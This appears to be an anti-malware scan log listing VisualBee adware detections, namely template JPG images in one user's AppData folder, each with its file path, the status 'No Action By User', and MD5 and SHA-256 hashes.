PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Christmas2_text.jpg, No Action By User, 169, 175250, , , , , 9D49A9E25B8B1D8CD13292C558C02157, 50172E3C23BA6A82F7B03E5C9D8FB0A267B9E82FEBC102CBF82E8C7793B82377
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Christmas2_thumb.jpg, No Action By User, 169, 175250, , , , , 768E12EDC58DFAE70FC97245551A69A3, FB2907B57C943B1ACE2708E5A0CE2BA925DAB494772E3825E1DC6E7E8C096FAB
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Comics01_smart.jpg, No Action By User, 169, 175250, , , , , CE2392F33EC6526A2F10D819E85F2DBF, 36349A1A4385C957CDA97E07DAA7BD2440CF91502AE6EA9F3D247D1A85616776
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Comics01_text.jpg, No Action By User, 169, 175250, , , , , B4C8214D60A40ACCC1634C48E855B44C, C128A26B37694403663D64BFE4EB35566E48E6A9BC956F146692F5CCD1AB28D8
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Comics01_thumb.jpg, No Action By User, 169, 175250, , , , , E1D704C59488D2CD1B9874965FC50797, 5971C7488FAA305C4940B559B78D7473A3D3BA9B4C069F186987547DDB6AE4D8
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Comics02_smart.jpg, No Action By User, 169, 175250, , , , , 279EF1A1F7BCD63948052C18644FACFA, 0DEE15F4059846C48FF3A32177AF5ECB335447612F23F829317ED88CDB1E784E
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Comics02_text.jpg, No Action By User, 169, 175250, , , , , 123974A27A48107F83CE9C0EF4E99807, B2F9F4D8A27EEEC33C0210F8AB5F3D1C24948230111B13C52739000B1905B8F9
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Comics02_thumb.jpg, No Action By User, 169, 175250, , , , , 678429AD0CA4652A13ECF1A3BCAAE276, 6B471A1D48F40AE4C702B36B6BA11E51A343BC53119E477F8EBA7B0BDCA8972A
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Comics03_smart.jpg, No Action By User, 169, 175250, , , , , 06A327FFF84F26DFFC199198A3073E98, 64BC5963636D483D2FCAFBAFB2D1016AD52FDEAAD892B18AFA6BB9F4DD181E71
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Comics03_text.jpg, No Action By User, 169, 175250, , , , , 07C0201FF4F34B746BE00D5141DF9633, 0D548BC3ABAEDAABDB5D92AD67DA7E7AAEB04BC74E7A038FCAA7C480A3FB4286
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Comics03_thumb.jpg, No Action By User, 169, 175250, , , , , 873631AFE3EDF63F057D0BB10CD24E2E, 2F52320EA18E47B93E41039E78A076A63B79AC6F6B1E552E6DE483F10EEC9AA9
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Comics04_smart.jpg, No Action By User, 169, 175250, , , , , C647F8ED50F65DAFB9ADAE4FE9F97839, 033289E9CB4CDF24AE3C341808D07F6C2E4D6FD40C9E4F10B029090FD3A8E022
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Comics04_text.jpg, No Action By User, 169, 175250, , , , , 30768D87037A6C7F49E8FC0B29D13DE8, 0A13A8450AF367EF444FC4DD233B468029E509213160921EA4BD683E859F7E3B
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Comics04_thumb.jpg, No Action By User, 169, 175250, , , , , 148DA2971AF3DB26EE6F352DADF53B60, C850F9CD0ACDB7C9D8008C4612E04577B948753E4824843A098B1042CD3E60B7
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Comics05_smart.jpg, No Action By User, 169, 175250, , , , , 52CDDA7508213A8D2CC1933BDE58BF6B, 48A35A72194CB84EA8D265407AA96354EF8A8A23CAD5F80B4C6C3C5D9E85A64E
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Comics05_text.jpg, No Action By User, 169, 175250, , , , , 155B65E1871AE03B0676DB6CD21F1745, 53F7AB53CB2C672BE08346412A50D7E85FCA722642B91B4F3DDD136305B42664
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Comics05_thumb.jpg, No Action By User, 169, 175250, , , , , 8A13DEA59785EF3996B562D11BA5F6D2, AC4A4DB3DA21A31C94CDA2B76F663CD957815271CE4ED6E66CD4A12D2F3D8292
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Comics06_smart.jpg, No Action By User, 169, 175250, , , , , 09E4350A9E9CCF68301C5667023965B5, 646EB6AB952FFB585860EF9AC3A21F6F0BD33765ECE5A905E98A4CD771C16054
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Comics06_text.jpg, No Action By User, 169, 175250, , , , , ED9D848258257C342430F65041BA5EB5, E401027DAA4CD0EB9E1A858BB9EB38BA8013B859D7F00DFEAAA344531C31E7FF
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Comics06_thumb.jpg, No Action By User, 169, 175250, , , , , 14215462C2AB6A475067053C6195EDDD, 59DCE595B364498AB0467B3D390A9007277A40C9B354B2383188DD11F40990FB
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Flashy_Colours_Angles_smart.jpg, No Action By User, 169, 175250, , , , , 852DAFAB3BC584CCA2B4C981F475CECD, E11E231A1409E0642CFDC4D1961EEE11D0E2AF67A88B7BC520453C1FAEFD05EC
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Flashy_Colours_Angles_text.jpg, No Action By User, 169, 175250, , , , , 24A8811F3D53506ABE40A582D5B3F13A, 85924AF7152AB0FD60D22229AF8CC15A3FD0EB73682114B62DFE05F6D3DF4035
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Flashy_Colours_Angles_thumb.jpg, No Action By User, 169, 175250, , , , , 8E19B1AF4AB4BC476D0A774BB8826929, 6DBB2F11B047D3400250FAE1A3D0D5770A78878720B3084CD01256892710FDDC
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Flashy_Colours_Apo_smart.jpg, No Action By User, 169, 175250, , , , , E60394E6952B8EAD2814068771E598E1, 664A25E143A0A96DA80C956B3C04EE375E44528386D3E60598772FD1AC0DF08A
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Flashy_Colours_Apo_text.jpg, No Action By User, 169, 175250, , , , , CECC879FB7B86B6EB371C40F5CEB8861, 70696B51C0A30B68F99B6874CC74F463AFE98306851003BE29A7BC4E5BACE3A4
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Flashy_Colours_Apo_thumb.jpg, No Action By User, 169, 175250, , , , , CF868CC5ECFC2676FAB3CE0B1707C3F9, 4B9E4EA4FB273549596864261BC786261D270F5D8DBADCE3B4517DA3CB2C44D3
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Flashy_Colours_BlackTie_smart.jpg, No Action By User, 169, 175250, , , , , 2D5BC331BCCDCCC678E440210AFA7D52, BC300FAB60C83D0ED0DC44A771944BDDA88D262128E467BAA75E2D643A734FA0
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Flashy_Colours_BlackTie_text.jpg, No Action By User, 169, 175250, , , , , D16EE0A4C65783B635FDCB2D28FBAE17, 3E24A311C9B59014C219B930709AF3EEBF99091C083DF8B4E2BC45B66C323A37
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Flashy_Colours_BlackTie_thumb.jpg, No Action By User, 169, 175250, , , , , 6351FEA76C650146C0C432DF465DAF8F, 36B58290E6A9782494F61D7CA9A098432543B87CD33B737218E348123AD66F78
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Flashy_Colours_Composite_smart.jpg, No Action By User, 169, 175250, , , , , FFF37C78CE56DF9C99D2D10C6DB3C351, 2CE534E86A5CCBD9D3F2BC9E169E8685502E55524DB3495C8FA6FEED54F41687
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Flashy_Colours_Composite_text.jpg, No Action By User, 169, 175250, , , , , 7F385ACFC38AE6258DAE6ADADEDF013A, 6E8AEA2FF35F84E5D6FD3122167CF28C2136B2014F5BE2386E2D5A11A012D313
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Flashy_Colours_Composite_thumb.jpg, No Action By User, 169, 175250, , , , , 36241322AE3B3E4DDBFA2FF548E7D134, B100FC10A43FD623F20559350F6A3F836ECEA0091D6A189FE38005D553F950F2
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Flashy_Colours_Elemental_smart.jpg, No Action By User, 169, 175250, , , , , 9BA2B587BB7034442E468409074F21A3, A5F9AF036178F79138FA0FAEBA5BE43305DDC486C0339346B452272546E32510
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Flashy_Colours_Elemental_text.jpg, No Action By User, 169, 175250, , , , , CB9A4A51211F35DC10F288097FBD1CE9, E4FB5F98FB56C89B4B934513C9823CF91AD5022FE1B4375A0B5E612204FBFB60
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Flashy_Colours_Elemental_thumb.jpg, No Action By User, 169, 175250, , , , , F937714FBBF32760AC64765731927BC2, 8F04C72BEFDF463D111CA24811EBAA442A8E1D3E1E4BDB5528E0C1B2DC1E7C70
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Flashy_Colours_gray_smart.jpg, No Action By User, 169, 175250, , , , , D33F81F485220F00D0477DF4953967D5, 9A10A3F3C852439B124442A5B1D7DB22E23E956E4C3B66D5D55E9260721FD1E0
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Flashy_Colours_gray_text.jpg, No Action By User, 169, 175250, , , , , 5EA185354F5B2AA6A1635F5A8805FCC9, 8752DC08BBBAF32F137DCC3974C111314F5102ED682225B17697BEF90EBFE324
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Flashy_Colours_gray_thumb.jpg, No Action By User, 169, 175250, , , , , BA7843C6CD0210BBE5A8F09BA1B104F4, B55EDE4DC5ECB005DFCB86A39D0FE21B51334F3DBEAC7E651C8A70483E03CB73
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Flashy_Colours_Horizon_smart.jpg, No Action By User, 169, 175250, , , , , A103E4C87F2CEDE407E85F75FB83461F, B0CDFCBA31044253EA75D6EE862AA15D5DCCBBA1BF3CCD155D13255F8B0C04CA
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Flashy_Colours_Horizon_text.jpg, No Action By User, 169, 175250, , , , , D114B4056C3C0097103F6AE4F7B2FC9A, CDF9466FF59AF472F9E926F175063B40504A1A1A8CC4FB15746594209BA445E5
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Flashy_Colours_Horizon_thumb.jpg, No Action By User, 169, 175250, , , , , 227E3D2DED38ABBB5D5E8CFFBE1E2515, 57474FE60174773F436126D606103394E043E857188CD911ABD13393D5DF8283
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Flashy_Colours_Newspaper_smart.jpg, No Action By User, 169, 175250, , , , , 2A0CFC16B49549C1EC57C8FDAD01482A, 03438BF6BD3A91204F6FF3D6FC81138758395CA95E9D1379EA8CF18A45177DC4
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Flashy_Colours_Newspaper_text.jpg, No Action By User, 169, 175250, , , , , F1165E3053954EEC89E3CCA146753B9D, 56067D7DEAED8BC4CC1C7470527B525DA5FBCB13E9D9ED56FBF41E5316A26766
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Flashy_Colours_Newspaper_thumb.jpg, No Action By User, 169, 175250, , , , , F6D2528975F1CF08E14B554830F05C99, 3D81E438B4A988012A80DDD82974D2A412311BB76A44D9285ACD8DF6FB1F2F31
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Flashy_Colours_Paper_smart.jpg, No Action By User, 169, 175250, , , , , D80882C13C38C5E8EE87E76A14AF2C76, 87C814D1881C23AACCAB4C6BA944BB1264CBD7CF0540DE16F72A89E7B4B9326E
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Flashy_Colours_Paper_text.jpg, No Action By User, 169, 175250, , , , , 9993D05916C410444B6C497B5CFD67D7, D37AFCBFF7D97CDAD65E7D0CA1E3C47C73C2C218BDD097E743E98F396045BE88
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Flashy_Colours_Paper_thumb.jpg, No Action By User, 169, 175250, , , , , 39775E7DBA4A6526D67E80178990ACB4, 1F707F31D0AF807B4EBB1CD0FFADDFC389051F3766983E0BC9966DFB5ADFCE5A
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Flashy_Colours_smart.jpg, No Action By User, 169, 175250, , , , , 85F5076BD714C30567BE060D1B2BB509, 317341B4770456C77334233DB909E4873EA85FB2DC2F8D14A68A3B9859677ACD
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Flashy_Colours_Technic_smart.jpg, No Action By User, 169, 175250, , , , , 7479EC1681CC64D75EEC7B8E1541CA24, 29B0A14C2662D1FDAEA80D6BE44684F5162ECEC41A495E8A73C9E99958A080D5
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Flashy_Colours_Technic_text.jpg, No Action By User, 169, 175250, , , , , 86B2BDA607B038D894B4C12FA7EF6504, EDABC207E6EF4A38E5F150ED0081053058D4F581FA10359D9D1F540B530D6267
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Flashy_Colours_Technic_thumb.jpg, No Action By User, 169, 175250, , , , , 6E177922976ADEC23F2D38140321AD72, C8B73B75EC45615121942D0075CBDC69DD091DA7C7A8EE2EC2794733590D15B3
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Flashy_Colours_text.jpg, No Action By User, 169, 175250, , , , , 811CFFF396C3BDADDD5255DD88AD041F, 935807B307D5AE02B7EEBFF13238D95A3397E532258C028A21B97A6D7D727759
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Flashy_Colours_thumb.jpg, No Action By User, 169, 175250, , , , , DFFA29A1AE75D81E460EDCAE60F18F55, CE42BF91458B4DC6BB067F4BDFE51E4E3093572B71DBB0833527BD164C8AAE81
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Flashy_Colours_Verve_smart.jpg, No Action By User, 169, 175250, , , , , 99131A308F36BC1FABF442248468CA0B, 722F92E567FA0A080DF0E5D80C621519BFAF05C64BAD01937F728CBE7BAD7D4A
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Flashy_Colours_Verve_text.jpg, No Action By User, 169, 175250, , , , , 8979BCC13D8E23F9366CDC69DEC35390, E5920664DB3F3F96D0760BB95F663251D22104F0721614689C8E6EE0F9C67464
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Flashy_Colours_Verve_thumb.jpg, No Action By User, 169, 175250, , , , , 4473D7A45BCDEAB848F2F9A97751B416, 4A59812E2E831E21566E5371808C8333DF6C31C74536C3FE52C0681182A02FA1
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Guga_Bubbles_smart.jpg, No Action By User, 169, 175250, , , , , F7CD5E06A850EF3579F417846345E752, 5B4E785A2B9C55B0C3FEF79E20FE409AEBD3792F7ACF6216485884B2C1DF0975
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Guga_Bubbles_text.jpg, No Action By User, 169, 175250, , , , , B36C5BF7E570B34CF8772EEA9449BE76, 1A61A5F43E49CABC7DF3505936ACADF91E52B9F8410F78C53E53B94313A69245
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Guga_Bubbles_thumb.jpg, No Action By User, 169, 175250, , , , , E3A280A4D3566E1BB79A87E8169D933A, AD1BE0F9C240B67FA07D9AE20439C676F5F6BD5FBBCEC2386DD40EC3750C9B82
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Guga_Classic_smart.jpg, No Action By User, 169, 175250, , , , , 0DEC2B2826EDBCC19CDC0D6915C364B4, CD4296F8C6EE855C654490629D7E116CBC79FE872465BD16A4BACA66C46DA25F
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Guga_Classic_text.jpg, No Action By User, 169, 175250, , , , , 999CEB2791A8FDB41F84F84A2DEA72A7, E36E2A5A1A0D0461A8344C2ACF90914CDD056EEB7AADC2CC7FB3CAF9798D75AE
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Guga_Classic_thumb.jpg, No Action By User, 169, 175250, , , , , C3A3212E5E99283A0E938442ED42ABF1, F3903CF1C0C96E48827182BC8A6855C8BB3433D757212B889C0AC584A4F82705
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Guga_Desert_smart.jpg, No Action By User, 169, 175250, , , , , B12777A6B997D1BA91DD425A7E485E1C, 0D492CA7539F76834F74CE4ECA33C82B8269A70008CDCB2EA7D195EC1FE1A453
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Guga_Desert_text.jpg, No Action By User, 169, 175250, , , , , 47A296D19490914583CFC96AA84F2BFB, C4730C1914B518717D25F392C1F09417D466C22254C8B7D2F8E360DDCD9A1E44
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Guga_Desert_thumb.jpg, No Action By User, 169, 175250, , , , , ECF30FBE9AD81007C49233493423567D, FA965170920FF2438C011E47EDE681FBC9C55B85AA11C48FA538E17CC4D9ACAB
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Guga_Earth_smart.jpg, No Action By User, 169, 175250, , , , , FB3C25848C9F103FE84AC33A7AC128D1, DCAF6D3CA97BEE63D9BF2314DA223D38F42B7A268DC0BFB504A1057E3B5D66F0
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Guga_Earth_text.jpg, No Action By User, 169, 175250, , , , , 3034C59266B0BE3EE864C44E95FE9BD5, 5A68E4D890523EE4C5789516DECB9B9B3964EFF0DC7D330F71108056658A8443
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Guga_Earth_thumb.jpg, No Action By User, 169, 175250, , , , , B425E65DEADEC13F8AA49C7EDFCFCA86, CF10D9BEDE1C5AA19A442686A296101BD881E533086B1511DC61F52650B8983F
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Guga_Flower_smart.jpg, No Action By User, 169, 175250, , , , , 15A1674659238F8FBEC38A63A5738FFA, C048D1BF12AAF3709411A73011215D22383F84F3820D8179C3652CA0C298A639
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Guga_Flower_text.jpg, No Action By User, 169, 175250, , , , , 2E405E39E4C6339B6BE62F30B60DC510, 0485BD658F52C83C46EC05F10FF6086A543AE3B0A769D0FDF0A7B2D361076C37
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Guga_Flower_thumb.jpg, No Action By User, 169, 175250, , , , , D910354654CB687B7F26BC88FD4BE68B, 57166973667875847B73AE14F3A7459C1C69B1DFB1BC882D7C83B1284D6FAEC3
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Guga_Leaves_smart.jpg, No Action By User, 169, 175250, , , , , 85FEEF2A0DD25E68719ADEB9B4C8AD42, 59D4E3B52941CF43F44E033780D95DC970621A93E67A9CC867E8A6A41DDB5A10
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Guga_Leaves_text.jpg, No Action By User, 169, 175250, , , , , FC6722F6C785A0BCE40E213B90498DF2, 6E8108CBAD6D252EEC2AF6F898C242BBB342DA354EF4FDEF596137EA651BA6AF
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Guga_Leaves_thumb.jpg, No Action By User, 169, 175250, , , , , 05EA9704202CD7C885DF355D9790A6F0, 02C92FD76DE7059305553231EAF368BC41FE2748A23BEFFAAF70A743C0082A58
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Guga_Ornament_smart.jpg, No Action By User, 169, 175250, , , , , 80860B07783E87B3447B30C033E9B357, D8B18F617FD348D2BC3FB9442F372D94918C52C1A90EA4759D7F530120ADD69C
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Guga_Ornament_text.jpg, No Action By User, 169, 175250, , , , , 014FC6096652BDF58D41C56EB7DCF24A, 8F59CACECF34CA5835815B1CE7746ABE95E15645A1905849B669060A86674571
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Guga_Ornament_thumb.jpg, No Action By User, 169, 175250, , , , , D6FFE8777E96353698EB2937ABA19583, 95FF7527CB36B8AC279AF3E275B69CE1382BA9CE6851E4F4E9EA0BC5F4C31C9C
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Guga_Sky_smart.jpg, No Action By User, 169, 175250, , , , , 82C46AC9C84595A36B0C055C750C4E3D, D7DF29E1C31A831556F49F092EE53FC14B6E744130CD897E9826A0C900024EFE
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Guga_Sky_text.jpg, No Action By User, 169, 175250, , , , , 1AD1E116D3FFEF13ECDE8F66D7ACA1D3, 2EA1FED1FB55888681170E2A2CBF3D8E2A5A1D8346F70856D0C57462124A2B72
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Guga_Sky_thumb.jpg, No Action By User, 169, 175250, , , , , 5E3684F0D6C2FA9DF9A15E7BE7F061D6, 9F90BB37B7CD493FF77EE721627764116A5CE926B12B36F0976B74F7D6F1D930
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Guga_Sport_smart.jpg, No Action By User, 169, 175250, , , , , D48A722611369800F2280645C762FA9D, 6E70BA1EA0AB576A5AEF5122D9940417618628DA4CF78489E80CBFB25482A337
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Guga_Sport_text.jpg, No Action By User, 169, 175250, , , , , 489F458B29923EF5B473D4116AD5C25E, 77E64AB783149502BFA5774770C0899B82A77CC690E798DD91D1BBC637C8F88C
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Guga_Sport_thumb.jpg, No Action By User, 169, 175250, , , , , BDA418FB163E4D29F518A4B2FFF45AA2, C06EDC5C1AD788572CAC2C8E713AE6966F3BF1935E02EF171D1380E1953CF617
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Guga_Urban_smart.jpg, No Action By User, 169, 175250, , , , , 4411A9ED0B5A9C1FD98ED1A34DD3EC4A, 9D6DA47E45D27A08FAB5B51333F6CF61FD8CDD1E29C0652C73D02AE85C67A4D2
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Guga_Urban_text.jpg, No Action By User, 169, 175250, , , , , 1BB279958C35525D473393A4030093EF, FE91B5EDDE39269275E83B3BB13A08603E391C9F6B2BB768A3EFA26C24FA333D
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Guga_Urban_thumb.jpg, No Action By User, 169, 175250, , , , , E17C202AE3C6FAFDEB0188E355C77B86, AE7ED911D3E53FA4976C5E8ABC1D8119F90527CAE860CCDFF63C3BAB05995337
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\HandShake_smart.jpg, No Action By User, 169, 175250, , , , , E3CC9EBFE76A7388232495E01C95578E, 60B3AFF3863B7BCAEC939E02600884103D4C76074B4DA6AFF18FDD5586F78537
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\HandShake_text.jpg, No Action By User, 169, 175250, , , , , DF96E3DEFC5A001636CACDA06D4E8E45, A195234DE25544E89873352001624DA06499FEB7FC008D808B78131811711E80
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\HandShake_thumb.jpg, No Action By User, 169, 175250, , , , , 542921B9A17DCB0CB21733EA839DC059, 5F03B2277BE1D157274C3E0B4A8042AC704E78E1FF658131096BB9A78754932B
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Large_title_A_smart.jpg, No Action By User, 169, 175250, , , , , 9C2D7C3349665E1B5E663C3D10F1B541, E757E1D186F5AF2D3082D7ACAF84E0B0B281EBB1C974B3483FA59459A17C4F9D
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Large_title_A_text.jpg, No Action By User, 169, 175250, , , , , 8D9FE1F00B15F81BE294E2DF94DECECA, B70169C2923CE438781C75FB51A546CD3D0FFBCE2493F5DBD0627FCA429814B8
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Large_title_A_thumb.jpg, No Action By User, 169, 175250, , , , , C86A3C3CAE746DBC88FC4F00392033EF, 525D19B1935C4481EA5F3CF2826B9D86B41038463C1FA11BDD41EACF5B9FFFDA
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Large_title_B_smart.jpg, No Action By User, 169, 175250, , , , , 86210C27BB4F14B82AFA124080202F83, FED99693EDAAF2B417F3BA0F8B12CA7F9904E09A34089AA107767B2E293A5B15
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Large_title_B_text.jpg, No Action By User, 169, 175250, , , , , 84CDB34B374BF46ACC49D8A01009366E, 9553727B9E71885B86B80127F3305EBDD19491D1B220FE2B8E12826B7B38C83F
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Large_title_B_thumb.jpg, No Action By User, 169, 175250, , , , , 524D89487F2AD50EE67699CB0C5CFBC8, CAC0356D0EA7000A0593D161C55A445627188DFB7E0D32FC58E5205F9E89A2B6
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Large_title_C_smart.jpg, No Action By User, 169, 175250, , , , , 6CE654F96D48F57F87857D99CF733A3E, 5FC635BAFCD5551170C044707DF76CA4EB94DF65FED8DD845D13F5FA6C32CBA2
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Large_title_C_text.jpg, No Action By User, 169, 175250, , , , , BFD7E1727BDE977DADB3A735E310BDE9, F29CC4D9F5266F79D2914E13B3114AA9F0D22C35BF0EDD780DC68623F8D73924
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Large_title_C_thumb.jpg, No Action By User, 169, 175250, , , , , 7F94272F6493A1DBE17A75744BD50B33, C53148E58862B6ED349AA6AE6F00558D6A9BBA25DD4CA1FA3C6AEF55218E9390
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Large_title_D_smart.jpg, No Action By User, 169, 175250, , , , , C634F05E42009FD2870AB80478B71253, 1DB10F490F92A0562AEE9C1583E51BA146DFA20C94FA20FD550DF970B1E9D3FA
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Large_title_D_text.jpg, No Action By User, 169, 175250, , , , , CEA8A4AE7DF909EDCDB54A4E4CB68489, 2890BDAE25CB3F812FFF465E31AE67D6303D6E93E7B12C82CE277261CCE972BF
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Large_title_D_thumb.jpg, No Action By User, 169, 175250, , , , , 83F23081682C0EFC6CC0B3F70742857B, 9418578A6B7F42CF8830E07160397CC8EF409AFCC0D5D5FDCD34438ED3790B59
